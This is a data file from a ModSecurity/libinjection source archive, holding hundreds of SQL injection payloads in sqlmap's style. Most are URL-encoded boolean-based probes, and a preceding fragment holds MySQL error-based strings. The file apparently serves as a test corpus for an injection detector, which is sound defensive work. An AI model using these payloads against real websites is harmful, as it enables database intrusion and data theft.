ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ 1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg 1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs 1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu 1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR 1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO 1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC 1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY 1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv 1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS 1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM 1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG 1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg 1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX 1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH 1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370 1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN 1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212 1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT 1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114 1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn 1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068 1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248 1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064 1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697 1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805 1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031 EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x)) modsecurity-v3.0.4/others/libinjection/data/sqli-sqlmap-20130419.txt0000644000175000017500003410270513607066311025317 0ustar zimmerlezimmerle1%29%20AND%205628%3D4794 1%29%20AND%208941%3D8941 1%29%20AND%204961%3D2914%20AND%20%282438%3D2438 1%29%20AND%208941%3D8941%20AND%20%284999%3D4999 1%29%29%20AND%209635%3D3658%20AND%20%28%284935%3D4935 1%29%29%20AND%208941%3D8941%20AND%20%28%288426%3D8426 1%29%29%29%20AND%207426%3D3499%20AND%20%28%28%288724%3D8724 1%29%29%29%20AND%208941%3D8941%20AND%20%28%28%284616%3D4616 1%20AND%204553%3D2363 1%20AND%208941%3D8941 1%29%20WHERE%209440%3D9440%20AND%204519%3D2025%20--%20 1%29%20WHERE%205731%3D5731%20AND%208941%3D8941%20--%20 1%20WHERE%201721%3D1721%20AND%205165%3D6833%20--%20 1%20WHERE%203888%3D3888%20AND%208941%3D8941%20--%20 1%27%29%20AND%206747%3D4164 1%27%29%20AND%208941%3D8941 1%27%20AND%203708%3D4806 1%27%20AND%208941%3D8941 1%22%20AND%203979%3D5092 1%22%20AND%208941%3D8941 1%27%29%20AND%205105%3D8711%20AND%20%28%27rZEZ%27%3D%27rZEZ 1%27%29%20AND%208941%3D8941%20AND%20%28%27zdab%27%3D%27zdab 1%27%29%29%20AND%205065%3D2950%20AND%20%28%28%27oOZc%27%3D%27oOZc 1%27%29%29%20AND%208941%3D8941%20AND%20%28%28%27pAER%27%3D%27pAER 1%27%29%29%29%20AND%204607%3D6073%20AND%20%28%28%28%27yigV%27%3D%27yigV 1%27%29%29%29%20AND%208941%3D8941%20AND%20%28%28%28%27lJzB%27%3D%27lJzB 1%27%20AND%203418%3D4051%20AND%20%27fPvw%27%3D%27fPvw 1%27%20AND%208941%3D8941%20AND%20%27MDir%27%3D%27MDir 1%27%29%20AND%203977%3D4926%20AND%20%28%27eaun%27%20LIKE%20%27eaun 1%27%29%20AND%208941%3D8941%20AND%20%28%27vjSh%27%20LIKE%20%27vjSh 1%27%29%29%20AND%208345%3D2021%20AND%20%28%28%27pRxr%27%20LIKE%20%27pRxr 1%27%29%29%20AND%208941%3D8941%20AND%20%28%28%27UxPA%27%20LIKE%20%27UxPA 1%27%29%29%29%20AND%207061%3D1982%20AND%20%28%28%28%27qvdm%27%20LIKE%20%27qvdm 1%27%29%29%29%20AND%208941%3D8941%20AND%20%28%28%28%27yiqI%27%20LIKE%20%27yiqI 1%27%20AND%206516%3D7054%20AND%20%27BWhN%27%20LIKE%20%27BWhN 1%27%20AND%208941%3D8941%20AND%20%27MIDI%27%20LIKE%20%27MIDI 1%22%29%20AND%202705%3D6980%20AND%20%28%22EJfC%22%3D%22EJfC 1%22%29%20AND%208941%3D8941%20AND%20%28%22jFPI%22%3D%22jFPI 1%22%29%29%20AND%206856%3D3192%20AND%20%28%28%22QeDo%22%3D%22QeDo 1%22%29%29%20AND%208941%3D8941%20AND%20%28%28%22arEQ%22%3D%22arEQ 1%22%29%29%29%20AND%201849%3D7545%20AND%20%28%28%28%22EqyH%22%3D%22EqyH 1%22%29%29%29%20AND%208941%3D8941%20AND%20%28%28%28%22SLzE%22%3D%22SLzE 1%22%20AND%207128%3D2621%20AND%20%22jbph%22%3D%22jbph 1%22%20AND%208941%3D8941%20AND%20%22AeeA%22%3D%22AeeA 1%22%29%20AND%202407%3D5660%20AND%20%28%22lVoL%22%20LIKE%20%22lVoL 1%22%29%20AND%208941%3D8941%20AND%20%28%22IIeb%22%20LIKE%20%22IIeb 1%22%29%29%20AND%203404%3D1686%20AND%20%28%28%22Ltwj%22%20LIKE%20%22Ltwj 1%22%29%29%20AND%208941%3D8941%20AND%20%28%28%22KdKS%22%20LIKE%20%22KdKS 1%22%29%29%29%20AND%202516%3D2755%20AND%20%28%28%28%22mUUl%22%20LIKE%20%22mUUl 1%22%29%29%29%20AND%208941%3D8941%20AND%20%28%28%28%22mzcC%22%20LIKE%20%22mzcC 1%22%20AND%206904%3D9569%20AND%20%22IIXr%22%20LIKE%20%22IIXr 1%22%20AND%208941%3D8941%20AND%20%22rTSm%22%20LIKE%20%22rTSm 1%25%27%29%20AND%205518%3D8817%20AND%20%28%27%25%27%3D%27 1%25%27%29%20AND%208941%3D8941%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%203880%3D8455%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%20AND%208941%3D8941%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%202499%3D8339%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%208941%3D8941%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%206989%3D3382%20AND%20%27%25%27%3D%27 1%25%27%20AND%208941%3D8941%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%203521%3D8623%20AND%20%28%27sVzW%27%3D%27sVzW 1%00%27%29%20AND%208941%3D8941%20AND%20%28%27oMve%27%3D%27oMve 1%00%27%20AND%204095%3D8053%20AND%20%27fdOk%27%3D%27fdOk 1%00%27%20AND%208941%3D8941%20AND%20%27HdAh%27%3D%27HdAh 1%27%29%20WHERE%208568%3D8568%20AND%205779%3D4967%20--%20 1%27%29%20WHERE%202530%3D2530%20AND%208941%3D8941%20--%20 1%22%29%20WHERE%204283%3D4283%20AND%206836%3D8969%20--%20 1%22%29%20WHERE%202387%3D2387%20AND%208941%3D8941%20--%20 1%27%20WHERE%205451%3D5451%20AND%205562%3D8673%20--%20 1%27%20WHERE%208164%3D8164%20AND%208941%3D8941%20--%20 1%22%20WHERE%206891%3D6891%20AND%201159%3D6901%20--%20 1%22%20WHERE%205719%3D5719%20AND%208941%3D8941%20--%20 1%27%7C%7C%28SELECT%20%27ZQhU%27%20FROM%20DUAL%20WHERE%209039%3D9039%20AND%209934%3D6197%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27kjTC%27%20FROM%20DUAL%20WHERE%207960%3D7960%20AND%208941%3D8941%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27qEKp%27%20WHERE%204663%3D4663%20AND%206056%3D6297%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27jupJ%27%20WHERE%201011%3D1011%20AND%208941%3D8941%20%29%7C%7C%27 1%27%2B%28SELECT%20UOTS%20WHERE%208784%3D8784%20AND%207096%3D4295%20%29%2B%27 1%27%2B%28SELECT%20LcPJ%20WHERE%203964%3D3964%20AND%208941%3D8941%20%29%2B%27 1%27%2B%28SELECT%20%27MXvd%27%20WHERE%208264%3D8264%20AND%204537%3D2921%20%29%2B%27 1%27%2B%28SELECT%20%27AJnQ%27%20WHERE%208139%3D8139%20AND%208941%3D8941%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206035%3D1193%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208941%3D8941%20%23 1%29%20AND%209401%3D2364%23 1%29%20AND%208787%3D8787%23 1%29%20AND%204327%3D3757%23 1%29%20AND%208787%3D8787%23 1%29%29%20AND%206687%3D6004%23 1%29%29%20AND%208787%3D8787%23 1%29%29%29%20AND%206209%3D5788%23 1%29%29%29%20AND%208787%3D8787%23 1%20AND%209717%3D1068%23 1%20AND%208787%3D8787%23 1%29%20WHERE%202501%3D2501%20AND%204477%3D4664%23 1%29%20WHERE%207082%3D7082%20AND%208787%3D8787%23 1%20WHERE%209915%3D9915%20AND%208050%3D8912%23 1%20WHERE%209381%3D9381%20AND%208787%3D8787%23 1%27%29%20AND%201001%3D7852%23 1%27%29%20AND%208787%3D8787%23 1%27%20AND%205482%3D2473%23 1%27%20AND%208787%3D8787%23 1%22%20AND%202405%3D8032%23 1%22%20AND%208787%3D8787%23 1%27%29%20AND%204036%3D4979%23 1%27%29%20AND%208787%3D8787%23 1%27%29%29%20AND%204330%3D6490%23 1%27%29%29%20AND%208787%3D8787%23 1%27%29%29%29%20AND%207237%3D7072%23 1%27%29%29%29%20AND%208787%3D8787%23 1%27%20AND%209195%3D4405%23 1%27%20AND%208787%3D8787%23 1%27%29%20AND%203656%3D9447%23 1%27%29%20AND%208787%3D8787%23 1%27%29%29%20AND%201328%3D8236%23 1%27%29%29%20AND%208787%3D8787%23 1%27%29%29%29%20AND%209236%3D7687%23 1%27%29%29%29%20AND%208787%3D8787%23 1%27%20AND%207738%3D6910%23 1%27%20AND%208787%3D8787%23 1%22%29%20AND%205020%3D9013%23 1%22%29%20AND%208787%3D8787%23 1%22%29%29%20AND%202390%3D9362%23 1%22%29%29%20AND%208787%3D8787%23 1%22%29%29%29%20AND%203594%3D3750%23 1%22%29%29%29%20AND%208787%3D8787%23 1%22%20AND%207046%3D9665%23 1%22%20AND%208787%3D8787%23 1%22%29%20AND%204208%3D8175%23 1%22%29%20AND%208787%3D8787%23 1%22%29%29%20AND%202294%3D5444%23 1%22%29%29%20AND%208787%3D8787%23 1%22%29%29%29%20AND%208883%3D5506%23 1%22%29%29%29%20AND%208787%3D8787%23 1%22%20AND%207911%3D5006%23 1%22%20AND%208787%3D8787%23 1%25%27%29%20AND%204893%3D4466%23 1%25%27%29%20AND%208787%3D8787%23 1%25%27%29%29%20AND%204264%3D9725%23 1%25%27%29%29%20AND%208787%3D8787%23 1%25%27%29%29%29%20AND%201781%3D6047%23 1%25%27%29%29%29%20AND%208787%3D8787%23 1%25%27%20AND%209027%3D9130%23 1%25%27%20AND%208787%3D8787%23 1%00%27%29%20AND%207841%3D4363%23 1%00%27%29%20AND%208787%3D8787%23 1%00%27%20AND%203807%3D5244%23 1%00%27%20AND%208787%3D8787%23 1%27%29%20WHERE%203891%3D3891%20AND%209049%3D4307%23 1%27%29%20WHERE%206165%3D6165%20AND%208787%3D8787%23 1%22%29%20WHERE%204009%3D4009%20AND%204570%3D1685%23 1%22%29%20WHERE%202519%3D2519%20AND%208787%3D8787%23 1%27%20WHERE%208581%3D8581%20AND%205292%3D3782%23 1%27%20WHERE%202031%3D2031%20AND%208787%3D8787%23 1%22%20WHERE%202338%3D2338%20AND%208262%3D8429%23 1%22%20WHERE%204053%3D4053%20AND%208787%3D8787%23 1%27%7C%7C%28SELECT%20%27cyqA%27%20FROM%20DUAL%20WHERE%207380%3D7380%20AND%203308%3D3366%23 1%27%7C%7C%28SELECT%20%27bQsC%27%20FROM%20DUAL%20WHERE%207852%3D7852%20AND%208787%3D8787%23 1%27%7C%7C%28SELECT%20%27zLws%27%20WHERE%204587%3D4587%20AND%204958%3D6445%23 1%27%7C%7C%28SELECT%20%27ltIt%27%20WHERE%207640%3D7640%20AND%208787%3D8787%23 1%27%2B%28SELECT%20ltSQ%20WHERE%209031%3D9031%20AND%207809%3D2722%23 1%27%2B%28SELECT%20ceeS%20WHERE%206114%3D6114%20AND%208787%3D8787%23 1%27%2B%28SELECT%20%27xFyA%27%20WHERE%204572%3D4572%20AND%206837%3D4164%23 1%27%2B%28SELECT%20%27jVuk%27%20WHERE%205088%3D5088%20AND%208787%3D8787%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%203616%3D8575%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208787%3D8787%23 1%29%20AND%201525%3D2537--%20 1%29%20AND%206250%3D6250--%20 1%29%20AND%201920%3D4312--%20 1%29%20AND%206250%3D6250--%20 1%29%29%20AND%204961%3D8468--%20 1%29%29%20AND%206250%3D6250--%20 1%29%29%29%20AND%201329%3D6752--%20 1%29%29%29%20AND%206250%3D6250--%20 1%20AND%203442%3D2538--%20 1%20AND%206250%3D6250--%20 1%29%20WHERE%204814%3D4814%20AND%204344%3D7627--%20 1%29%20WHERE%208144%3D8144%20AND%206250%3D6250--%20 1%20WHERE%204555%3D4555%20AND%208974%3D9941--%20 1%20WHERE%209054%3D9054%20AND%206250%3D6250--%20 1%27%29%20AND%208124%3D2264--%20 1%27%29%20AND%206250%3D6250--%20 1%27%20AND%206676%3D6882--%20 1%27%20AND%206250%3D6250--%20 1%22%20AND%203242%3D4668--%20 1%22%20AND%206250%3D6250--%20 1%27%29%20AND%203982%3D7798--%20 1%27%29%20AND%206250%3D6250--%20 1%27%29%29%20AND%208901%3D6659--%20 1%27%29%29%20AND%206250%3D6250--%20 1%27%29%29%29%20AND%207444%3D9263--%20 1%27%29%29%29%20AND%206250%3D6250--%20 1%27%20AND%206870%3D7652--%20 1%27%20AND%206250%3D6250--%20 1%27%29%20AND%205532%3D5697--%20 1%27%29%20AND%206250%3D6250--%20 1%27%29%29%20AND%209983%3D2651--%20 1%27%29%29%20AND%206250%3D6250--%20 1%27%29%29%29%20AND%204636%3D1365--%20 1%27%29%29%29%20AND%206250%3D6250--%20 1%27%20AND%203475%3D2967--%20 1%27%20AND%206250%3D6250--%20 1%22%29%20AND%209429%3D5290--%20 1%22%29%20AND%206250%3D6250--%20 1%22%29%29%20AND%205566%3D3031--%20 1%22%29%29%20AND%206250%3D6250--%20 1%22%29%29%29%20AND%204723%3D9024--%20 1%22%29%29%29%20AND%206250%3D6250--%20 1%22%20AND%203372%3D9752--%20 1%22%20AND%206250%3D6250--%20 1%22%29%20AND%206963%3D6309--%20 1%22%29%20AND%206250%3D6250--%20 1%22%29%29%20AND%205639%3D8622--%20 1%22%29%29%20AND%206250%3D6250--%20 1%22%29%29%29%20AND%207753%3D3675--%20 1%22%29%29%29%20AND%206250%3D6250--%20 1%22%20AND%201332%3D2210--%20 1%22%20AND%206250%3D6250--%20 1%25%27%29%20AND%204100%3D7015--%20 1%25%27%29%20AND%206250%3D6250--%20 1%25%27%29%29%20AND%207056%3D8198--%20 1%25%27%29%29%20AND%206250%3D6250--%20 1%25%27%29%29%29%20AND%203900%3D3967--%20 1%25%27%29%29%29%20AND%206250%3D6250--%20 1%25%27%20AND%208757%3D5140--%20 1%25%27%20AND%206250%3D6250--%20 1%00%27%29%20AND%203223%3D4457--%20 1%00%27%29%20AND%206250%3D6250--%20 1%00%27%20AND%206030%3D7440--%20 1%00%27%20AND%206250%3D6250--%20 1%27%29%20WHERE%203329%3D3329%20AND%202951%3D7531--%20 1%27%29%20WHERE%201207%3D1207%20AND%206250%3D6250--%20 1%22%29%20WHERE%201036%3D1036%20AND%202698%3D9845--%20 1%22%29%20WHERE%209237%3D9237%20AND%206250%3D6250--%20 1%27%20WHERE%203564%3D3564%20AND%206699%3D3979--%20 1%27%20WHERE%202797%3D2797%20AND%206250%3D6250--%20 1%22%20WHERE%201454%3D1454%20AND%204262%3D4296--%20 1%22%20WHERE%201395%3D1395%20AND%206250%3D6250--%20 1%27%7C%7C%28SELECT%20%27cjQE%27%20FROM%20DUAL%20WHERE%206196%3D6196%20AND%201729%3D2701--%20 1%27%7C%7C%28SELECT%20%27qMTL%27%20FROM%20DUAL%20WHERE%205127%3D5127%20AND%206250%3D6250--%20 1%27%7C%7C%28SELECT%20%27JEqH%27%20WHERE%209018%3D9018%20AND%204677%3D9664--%20 1%27%7C%7C%28SELECT%20%27JhFj%27%20WHERE%201212%3D1212%20AND%206250%3D6250--%20 1%27%2B%28SELECT%20qjIU%20WHERE%207391%3D7391%20AND%208599%3D9753--%20 1%27%2B%28SELECT%20OeEc%20WHERE%206508%3D6508%20AND%206250%3D6250--%20 1%27%2B%28SELECT%20%27wqgH%27%20WHERE%202760%3D2760%20AND%208701%3D4316--%20 1%27%2B%28SELECT%20%27lasJ%27%20WHERE%208232%3D8232%20AND%206250%3D6250--%20 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208118%3D3338--%20 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206250%3D6250--%20 -8200%29%20OR%20%287059%3D7652%29 -7234%29%20OR%20%287983%3D7983%29 -4207%29%20OR%20%289705%3D3380%29 -4025%29%20OR%20%289252%3D7774%29%20AND%20%285506%3D5506 -2098%29%20OR%20%287983%3D7983%29%20AND%20%287430%3D7430 -9397%29%20OR%20%285892%3D3411%29%20AND%20%288194%3D8194 -1053%29%29%20OR%20%282077%3D1660%29%20AND%20%28%289578%3D9578 -4466%29%29%20OR%20%287983%3D7983%29%20AND%20%28%283518%3D3518 -7341%29%29%20OR%20%286900%3D8017%29%20AND%20%28%284103%3D4103 -3166%29%29%29%20OR%20%283588%3D8909%29%20AND%20%28%28%284867%3D4867 -5112%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%282424%3D2424 -4108%29%29%29%20OR%20%281038%3D7807%29%20AND%20%28%28%288173%3D8173 -8163%20OR%20%286994%3D8692%29 -7352%20OR%20%287983%3D7983%29 -5433%20OR%20%285879%3D4698%29 -5921%29%20WHERE%203554%3D3554%20OR%20%287599%3D7280%29%20--%20 -3387%29%20WHERE%205808%3D5808%20OR%20%287983%3D7983%29%20--%20 -2387%29%20WHERE%208449%3D8449%20OR%20%281190%3D4875%29%20--%20 -9640%20WHERE%209754%3D9754%20OR%20%281646%3D2550%29%20--%20 -8951%20WHERE%204688%3D4688%20OR%20%287983%3D7983%29%20--%20 -5317%20WHERE%205764%3D5764%20OR%20%287942%3D4435%29%20--%20 -9394%27%29%20OR%20%283691%3D3381%29 -5030%27%29%20OR%20%287983%3D7983%29 -9547%27%29%20OR%20%286368%3D9774%29 -5688%27%20OR%20%289402%3D8480%29 -8569%27%20OR%20%287983%3D7983%29 -9320%27%20OR%20%281082%3D6404%29 -7291%22%20OR%20%287361%3D4969%29 -2039%22%20OR%20%287983%3D7983%29 -6989%22%20OR%20%284824%3D8081%29 -7771%27%29%20OR%20%283824%3D3034%29%20AND%20%28%27PNqU%27%3D%27PNqU -6501%27%29%20OR%20%287983%3D7983%29%20AND%20%28%27koaJ%27%3D%27koaJ -8822%27%29%20OR%20%288025%3D8399%29%20AND%20%28%27PBjo%27%3D%27PBjo -1059%27%29%29%20OR%20%283941%3D3622%29%20AND%20%28%28%27eQob%27%3D%27eQob -2089%27%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%27xlol%27%3D%27xlol -7869%27%29%29%20OR%20%283673%3D6074%29%20AND%20%28%28%27sZDn%27%3D%27sZDn -5281%27%29%29%29%20OR%20%282423%3D1067%29%20AND%20%28%28%28%27lzpK%27%3D%27lzpK -1515%27%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%28%27uUdO%27%3D%27uUdO -2375%27%29%29%29%20OR%20%284787%3D6364%29%20AND%20%28%28%28%27PGtv%27%3D%27PGtv -9301%27%20OR%20%286803%3D9992%29%20AND%20%27InNc%27%3D%27InNc -2126%27%20OR%20%287983%3D7983%29%20AND%20%27lDUA%27%3D%27lDUA -4379%27%20OR%20%287900%3D6842%29%20AND%20%27cFPv%27%3D%27cFPv -7883%27%29%20OR%20%286565%3D2771%29%20AND%20%28%27lOHj%27%20LIKE%20%27lOHj -9339%27%29%20OR%20%287983%3D7983%29%20AND%20%28%27fyvm%27%20LIKE%20%27fyvm -3817%27%29%20OR%20%285200%3D7262%29%20AND%20%28%27EGBg%27%20LIKE%20%27EGBg -9722%27%29%29%20OR%20%286418%3D8192%29%20AND%20%28%28%27xjPH%27%20LIKE%20%27xjPH -9908%27%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%27KIyX%27%20LIKE%20%27KIyX -7388%27%29%29%20OR%20%286064%3D8529%29%20AND%20%28%28%27DqSb%27%20LIKE%20%27DqSb -1905%27%29%29%29%20OR%20%288660%3D6599%29%20AND%20%28%28%28%27ugIh%27%20LIKE%20%27ugIh -3267%27%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%28%27gLBx%27%20LIKE%20%27gLBx -1952%27%29%29%29%20OR%20%284261%3D1465%29%20AND%20%28%28%28%27CQLW%27%20LIKE%20%27CQLW -2628%27%20OR%20%288744%3D6546%29%20AND%20%27lVTC%27%20LIKE%20%27lVTC -1630%27%20OR%20%287983%3D7983%29%20AND%20%27gKuM%27%20LIKE%20%27gKuM -4867%27%20OR%20%289898%3D7143%29%20AND%20%27jMZs%27%20LIKE%20%27jMZs -6804%22%29%20OR%20%286997%3D9062%29%20AND%20%28%22jJeG%22%3D%22jJeG -2110%22%29%20OR%20%287983%3D7983%29%20AND%20%28%22DtDs%22%3D%22DtDs -3077%22%29%20OR%20%281096%3D8905%29%20AND%20%28%22GcMh%22%3D%22GcMh -1186%22%29%29%20OR%20%282661%3D1022%29%20AND%20%28%28%22yDTf%22%3D%22yDTf -9738%22%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%22lUvI%22%3D%22lUvI -3079%22%29%29%20OR%20%286481%3D5280%29%20AND%20%28%28%22xfLV%22%3D%22xfLV -5270%22%29%29%29%20OR%20%286216%3D5245%29%20AND%20%28%28%28%22xwyx%22%3D%22xwyx -4267%22%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%28%22GwVZ%22%3D%22GwVZ -6959%22%29%29%29%20OR%20%282286%3D9663%29%20AND%20%28%28%28%22ZUaJ%22%3D%22ZUaJ -8609%22%20OR%20%284126%3D2605%29%20AND%20%22pNAl%22%3D%22pNAl -5794%22%20OR%20%287983%3D7983%29%20AND%20%22jaCh%22%3D%22jaCh -5791%22%20OR%20%285294%3D1486%29%20AND%20%22vYmk%22%3D%22vYmk -1589%22%29%20OR%20%287677%3D4849%29%20AND%20%28%22QuCT%22%20LIKE%20%22QuCT -5424%22%29%20OR%20%287983%3D7983%29%20AND%20%28%22qlVb%22%20LIKE%20%22qlVb -2941%22%29%20OR%20%282529%3D5819%29%20AND%20%28%22gDSO%22%20LIKE%20%22gDSO -6631%22%29%29%20OR%20%288317%3D8261%29%20AND%20%28%28%22MWqq%22%20LIKE%20%22MWqq -4206%22%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%22HFLa%22%20LIKE%20%22HFLa -6013%22%29%29%20OR%20%285023%3D3187%29%20AND%20%28%28%22fpCp%22%20LIKE%20%22fpCp -2591%22%29%29%29%20OR%20%286560%3D3273%29%20AND%20%28%28%28%22IMsb%22%20LIKE%20%22IMsb -5670%22%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%28%22UhCB%22%20LIKE%20%22UhCB -7998%22%29%29%29%20OR%20%287238%3D9841%29%20AND%20%28%28%28%22Mxpn%22%20LIKE%20%22Mxpn -8062%22%20OR%20%285382%3D7841%29%20AND%20%22jQVj%22%20LIKE%20%22jQVj -4595%22%20OR%20%287983%3D7983%29%20AND%20%22IDeD%22%20LIKE%20%22IDeD -8689%22%20OR%20%284953%3D6919%29%20AND%20%22aayV%22%20LIKE%20%22aayV -8949%25%27%29%20OR%20%285020%3D7782%29%20AND%20%28%27%25%27%3D%27 -3549%25%27%29%20OR%20%287983%3D7983%29%20AND%20%28%27%25%27%3D%27 -2087%25%27%29%20OR%20%287037%3D3434%29%20AND%20%28%27%25%27%3D%27 -5139%25%27%29%29%20OR%20%281209%3D4820%29%20AND%20%28%28%27%25%27%3D%27 -6202%25%27%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%27%25%27%3D%27 -2340%25%27%29%29%20OR%20%289211%3D7943%29%20AND%20%28%28%27%25%27%3D%27 -6072%25%27%29%29%29%20OR%20%286700%3D3431%29%20AND%20%28%28%28%27%25%27%3D%27 -6316%25%27%29%29%29%20OR%20%287983%3D7983%29%20AND%20%28%28%28%27%25%27%3D%27 -5258%25%27%29%29%29%20OR%20%284581%3D8300%29%20AND%20%28%28%28%27%25%27%3D%27 -9965%25%27%20OR%20%289301%3D9349%29%20AND%20%27%25%27%3D%27 -6629%25%27%20OR%20%287983%3D7983%29%20AND%20%27%25%27%3D%27 -4497%25%27%20OR%20%282477%3D9686%29%20AND%20%27%25%27%3D%27 -4923%00%27%29%20OR%20%289817%3D7704%29%20AND%20%28%27TnPn%27%3D%27TnPn -2977%00%27%29%20OR%20%287983%3D7983%29%20AND%20%28%27pgxl%27%3D%27pgxl -4431%00%27%29%20OR%20%285230%3D8173%29%20AND%20%28%27fuIa%27%3D%27fuIa -7432%00%27%20OR%20%283113%3D4117%29%20AND%20%27qlUe%27%3D%27qlUe -8851%00%27%20OR%20%287983%3D7983%29%20AND%20%27EgZJ%27%3D%27EgZJ -2219%00%27%20OR%20%284610%3D4796%29%20AND%20%27bWTD%27%3D%27bWTD -8812%27%29%20WHERE%205478%3D5478%20OR%20%286525%3D5771%29%20--%20 -6163%27%29%20WHERE%201528%3D1528%20OR%20%287983%3D7983%29%20--%20 -7427%27%29%20WHERE%205047%3D5047%20OR%20%286647%3D1475%29%20--%20 